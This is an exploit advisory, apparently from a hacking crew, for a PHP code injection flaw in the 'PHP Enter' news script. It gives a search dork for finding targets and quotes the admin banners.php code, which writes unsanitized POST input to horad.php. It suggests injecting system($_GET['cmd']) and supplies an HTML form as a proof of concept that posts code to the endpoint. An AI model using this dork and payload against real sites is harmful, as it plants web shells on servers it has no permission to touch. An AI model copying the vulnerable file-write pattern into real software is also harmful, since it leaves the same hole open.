######################################################## # # Exploit Title : Php Enter Php Code Injection # # Author : IrIsT.Ir & Sec4Ever.com # # Discovered By : L3b-r1'z # # Home : http://IrIsT.Ir & http://Sec4Ever.com # # P Blob : http://L3b-r1z.com/ # # Software Link : http://www.phpenter.net/ # # Security Risk : High # # Version : beta # # Tested on : win\XP # # Dork : allintext: "Powered by phpEnter.net" # # 1) Info Script # 2) Info Vulnerability # 3) P0c # ######################################################## # # 1) Info Script: # # PHP Enter is a free and Open Source PHP News Publishing script. # It is an online news publishing system that features easy installation, user submission. # and an admin panel for adding, editing and removing categories and news. ######################################################## # # 2) Info Vulnerability : # # This exploit allow attacker to inject php code execution like system($_GET['cmd']); # In file named banners in admin folder : # # 1. <?php # 2. if(isset($_POST['submit'])) # 3. { # 4. $ccode = $_POST['code']; # 5. # 6. $myFile="horad.php"; # 7. $fh = fopen($myFile, 'w') or die("can't open file- check CHMOD"); # 8. $stringData = "$ccode"; # 9. fwrite($fh, $stringData); # 10. fclose($fh); # 11. echo"<br /><center><font size=2 color=green>Successfully.</font></center>"; # 12. }else{ # 13. ?> # # Look to line 7 fopen MYFILE , $myfile="horad.php" or die can't open file check chmod. # fwrite FH variable and stringdata, So String Data doesn't secure :), can attacker to inject php code execution. # Look to line 4 : $_POST['code'];, attacker will inject in POST from any tool dev, like HTTP LIVE EDITOR, HTTP Live headers. # # ######################################################### # # 3) p0c : # # <form method="post" action="http://localhost/admin/banners.php"> # <center> # <font color=#3A586A>Code</font><br /> # <textarea name="code"></textarea> # <br /><br /> # <input type="submit" name="submit" VALUE=" Submit"><br /><br /><br /><br /> # </form> # ######################################################### # # Special Thx to : Irist.ir Team & Sec4ever.com Team # ######################################################### # # Greet'z : Am1r, The Injector, Sec4ever, b0x, Paulzz, Virus-Ra3ech, Damane2011 # Hacker-1420, Th3 Killer Dz, OVER-X <3, Stalk3r, The Viper, N4ss1m, B07 M4S73R # Ked-Ans, And All Members Of Irist And Sec4ever Team # #########################################################